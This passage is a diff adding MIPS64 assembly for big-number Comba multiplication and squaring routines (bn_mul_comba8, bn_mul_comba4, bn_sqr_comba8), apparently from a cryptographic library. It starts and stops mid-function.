+	daddu	c_3,t_2
+	sltu	c_1,c_3,t_2
+	dmultu	a_3,b_1		/* mul_add_c(a[3],b[1],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_2,b_2		/* mul_add_c(a[2],b[2],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_1,b_3		/* mul_add_c(a[1],b[3],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_0,b_4		/* mul_add_c(a[0],b[4],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	sd	c_2,32(a0)	/* r[4]=c2; */
+
+	dmultu	a_0,b_5		/* mul_add_c(a[0],b[5],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	c_2,c_1,t_2
+	dmultu	a_1,b_4		/* mul_add_c(a[1],b[4],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_2,b_3		/* mul_add_c(a[2],b[3],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_3,b_2		/* mul_add_c(a[3],b[2],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_4,b_1		/* mul_add_c(a[4],b[1],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_5,b_0		/* mul_add_c(a[5],b[0],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	sd	c_3,40(a0)	/* r[5]=c3; */
+
+	dmultu	a_6,b_0		/* mul_add_c(a[6],b[0],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	c_3,c_2,t_2
+	dmultu	a_5,b_1		/* mul_add_c(a[5],b[1],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_4,b_2		/* mul_add_c(a[4],b[2],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_3,b_3		/* mul_add_c(a[3],b[3],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_2,b_4		/* mul_add_c(a[2],b[4],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_1,b_5		/* mul_add_c(a[1],b[5],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_0,b_6		/* mul_add_c(a[0],b[6],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	sd	c_1,48(a0)	/* r[6]=c1; */
+
+	dmultu	a_0,b_7		/* mul_add_c(a[0],b[7],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	c_1,c_3,t_2
+	dmultu	a_1,b_6		/* mul_add_c(a[1],b[6],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_2,b_5		/* mul_add_c(a[2],b[5],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_3,b_4		/* mul_add_c(a[3],b[4],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_4,b_3		/* mul_add_c(a[4],b[3],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_5,b_2		/* mul_add_c(a[5],b[2],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_6,b_1		/* mul_add_c(a[6],b[1],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_7,b_0		/* mul_add_c(a[7],b[0],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	sd	c_2,56(a0)	/* r[7]=c2; */
+
+	dmultu	a_7,b_1		/* mul_add_c(a[7],b[1],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	c_2,c_1,t_2
+	dmultu	a_6,b_2		/* mul_add_c(a[6],b[2],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_5,b_3		/* mul_add_c(a[5],b[3],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_4,b_4		/* mul_add_c(a[4],b[4],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_3,b_5		/* mul_add_c(a[3],b[5],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_2,b_6		/* mul_add_c(a[2],b[6],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_1,b_7		/* mul_add_c(a[1],b[7],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	sd	c_3,64(a0)	/* r[8]=c3; */
+
+	dmultu	a_2,b_7		/* mul_add_c(a[2],b[7],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	c_3,c_2,t_2
+	dmultu	a_3,b_6		/* mul_add_c(a[3],b[6],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_4,b_5		/* mul_add_c(a[4],b[5],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_5,b_4		/* mul_add_c(a[5],b[4],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_6,b_3		/* mul_add_c(a[6],b[3],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_7,b_2		/* mul_add_c(a[7],b[2],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	sd	c_1,72(a0)	/* r[9]=c1; */
+
+	dmultu	a_7,b_3		/* mul_add_c(a[7],b[3],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	c_1,c_3,t_2
+	dmultu	a_6,b_4		/* mul_add_c(a[6],b[4],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_5,b_5		/* mul_add_c(a[5],b[5],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_4,b_6		/* mul_add_c(a[4],b[6],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_3,b_7		/* mul_add_c(a[3],b[7],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	sd	c_2,80(a0)	/* r[10]=c2; */
+
+	dmultu	a_4,b_7		/* mul_add_c(a[4],b[7],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	c_2,c_1,t_2
+	dmultu	a_5,b_6		/* mul_add_c(a[5],b[6],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_6,b_5		/* mul_add_c(a[6],b[5],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_7,b_4		/* mul_add_c(a[7],b[4],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	sd	c_3,88(a0)	/* r[11]=c3; */
+
+	dmultu	a_7,b_5		/* mul_add_c(a[7],b[5],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	c_3,c_2,t_2
+	dmultu	a_6,b_6		/* mul_add_c(a[6],b[6],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_5,b_7		/* mul_add_c(a[5],b[7],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	sd	c_1,96(a0)	/* r[12]=c1; */
+
+	dmultu	a_6,b_7		/* mul_add_c(a[6],b[7],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	c_1,c_3,t_2
+	dmultu	a_7,b_6		/* mul_add_c(a[7],b[6],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	sd	c_2,104(a0)	/* r[13]=c2; */
+
+	dmultu	a_7,b_7		/* mul_add_c(a[7],b[7],c3,c1,c2); */
+	ld	s0,0(sp)
+	ld	s1,8(sp)
+	ld	s2,16(sp)
+	ld	s3,24(sp)
+	ld	s4,32(sp)
+	ld	s5,40(sp)
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sd	c_3,112(a0)	/* r[14]=c3; */
+	sd	c_1,120(a0)	/* r[15]=c1; */
+
+	PTR_ADD	sp,FRAME_SIZE
+
+	jr	ra
+END(bn_mul_comba8)
+
+.align	5
+LEAF(bn_mul_comba4)
+	.set	reorder
+	ld	a_0,0(a1)
+	ld	b_0,0(a2)
+	ld	a_1,8(a1)
+	ld	a_2,16(a1)
+	dmultu	a_0,b_0		/* mul_add_c(a[0],b[0],c1,c2,c3); */
+	ld	a_3,24(a1)
+	ld	b_1,8(a2)
+	ld	b_2,16(a2)
+	ld	b_3,24(a2)
+	mflo	c_1
+	mfhi	c_2
+	sd	c_1,0(a0)
+
+	dmultu	a_0,b_1		/* mul_add_c(a[0],b[1],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	c_3,t_2,AT
+	dmultu	a_1,b_0		/* mul_add_c(a[1],b[0],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	c_1,c_3,t_2
+	sd	c_2,8(a0)
+
+	dmultu	a_2,b_0		/* mul_add_c(a[2],b[0],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	dmultu	a_1,b_1		/* mul_add_c(a[1],b[1],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	c_2,c_1,t_2
+	dmultu	a_0,b_2		/* mul_add_c(a[0],b[2],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	sd	c_3,16(a0)
+
+	dmultu	a_0,b_3		/* mul_add_c(a[0],b[3],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	c_3,c_2,t_2
+	dmultu	a_1,b_2		/* mul_add_c(a[1],b[2],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_2,b_1		/* mul_add_c(a[2],b[1],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_3,b_0		/* mul_add_c(a[3],b[0],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	sd	c_1,24(a0)
+
+	dmultu	a_3,b_1		/* mul_add_c(a[3],b[1],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	c_1,c_3,t_2
+	dmultu	a_2,b_2		/* mul_add_c(a[2],b[2],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_1,b_3		/* mul_add_c(a[1],b[3],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	sd	c_2,32(a0)
+
+	dmultu	a_2,b_3		/* mul_add_c(a[2],b[3],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	c_2,c_1,t_2
+	dmultu	a_3,b_2		/* mul_add_c(a[3],b[2],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	sd	c_3,40(a0)
+
+	dmultu	a_3,b_3		/* mul_add_c(a[3],b[3],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sd	c_1,48(a0)
+	sd	c_2,56(a0)
+
+	jr	ra
+END(bn_mul_comba4)
+
+#undef	a_4
+#undef	a_5
+#undef	a_6
+#undef	a_7
+#define	a_4	b_0
+#define	a_5	b_1
+#define	a_6	b_2
+#define	a_7	b_3
+
+.align	5
+LEAF(bn_sqr_comba8)
+	.set	reorder
+	ld	a_0,0(a1)
+	ld	a_1,8(a1)
+	ld	a_2,16(a1)
+	ld	a_3,24(a1)
+
+	dmultu	a_0,a_0		/* mul_add_c(a[0],b[0],c1,c2,c3); */
+	ld	a_4,32(a1)
+	ld	a_5,40(a1)
+	ld	a_6,48(a1)
+	ld	a_7,56(a1)
+	mflo	c_1
+	mfhi	c_2
+	sd	c_1,0(a0)
+
+	dmultu	a_0,a_1		/* mul_add_c2(a[0],b[1],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_1,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	c_3,t_2,AT
+	sd	c_2,8(a0)
+
+	dmultu	a_2,a_0		/* mul_add_c2(a[2],b[0],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_2,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_1,a_1		/* mul_add_c(a[1],b[1],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	sd	c_3,16(a0)
+
+	dmultu	a_0,a_3		/* mul_add_c2(a[0],b[3],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_3,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_1,a_2		/* mul_add_c2(a[1],b[2],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_3,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	sd	c_1,24(a0)
+
+	dmultu	a_4,a_0		/* mul_add_c2(a[4],b[0],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_1,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_3,a_1		/* mul_add_c2(a[3],b[1],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_1,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_2,a_2		/* mul_add_c(a[2],b[2],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	sd	c_2,32(a0)
+
+	dmultu	a_0,a_5		/* mul_add_c2(a[0],b[5],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_2,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_1,a_4		/* mul_add_c2(a[1],b[4],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_2,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_2,a_3		/* mul_add_c2(a[2],b[3],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_2,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	sd	c_3,40(a0)
+
+	dmultu	a_6,a_0		/* mul_add_c2(a[6],b[0],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_3,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_5,a_1		/* mul_add_c2(a[5],b[1],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_3,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_4,a_2		/* mul_add_c2(a[4],b[2],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_3,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_3,a_3		/* mul_add_c(a[3],b[3],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	sd	c_1,48(a0)
+
+	dmultu	a_0,a_7		/* mul_add_c2(a[0],b[7],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_1,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_1,a_6		/* mul_add_c2(a[1],b[6],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_1,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_2,a_5		/* mul_add_c2(a[2],b[5],c2,c3,c1); */
+	mflo	t_1
